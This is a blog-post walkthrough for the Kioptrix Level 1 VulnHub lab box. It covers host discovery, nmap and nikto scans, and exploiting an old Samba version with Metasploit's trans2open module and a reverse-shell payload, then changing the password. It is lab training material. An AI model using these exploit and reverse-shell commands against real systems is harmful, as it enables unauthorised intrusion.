Kioptrix level 1

KIOPTRIX: LEVEL 1 [Vulnhub] Walkthrough | Updated [2024]


In this post, let’s see how to CTF the Kioptrix level 1 box, and I am sure by the end of the blog post, You will be able to capture.

To download kioptrix level 1 [Click here]

KIOPTRIX: LEVEL 1 Walkthrough

In the Kioptrix level 1 we will be doing all the below steps;

  1. Finding IP
  2. Scanning network
  3. Enumerating
  4. Exploiting
  5. Post enumeration

Finding Target IP

To find the target IP, I will just enter sudo arp-scan -l,

Once you found your target IP, just follow the next step.

Network scanning

We are going to scan the target network IP in nmap, If you prefer Masscan you can also go with it…

I am searching for the service and OS. So, I will enter this command ????????

nmap -A

From the above pic, we can see the SMB2 protocol negotiation failed. Basically, the SMB (Port 445) is not very secure.


In the enumeration, let’s paste the target IP in the browser.

We can’t find any useful information, So I will just enter /etc at the end like this

We can take a note on this Apache/1.3.20 Server at Port 80

Vulnerability scanning

I am going to scan the target in nikto

nikto -h

We can see the target is vulnerable to samba versions 2.2.0 to 2.2.8


Let’s exploit the target using the msfconsole

use exploit/linux/samba/trans2open
msf exploit(linux/samba/trans2open) > set rhost
msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
msf exploit(linux/samba/trans2open) > exploit

Post enumeration

In the post enumeration step, let’s change the password and log into kioptrix level 1. To change the password, just enter passwd


There are 5 levels in Kioptrix and we have completed 1 and there are 4 other level in the CTF challenge menu.

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site


Scroll to Top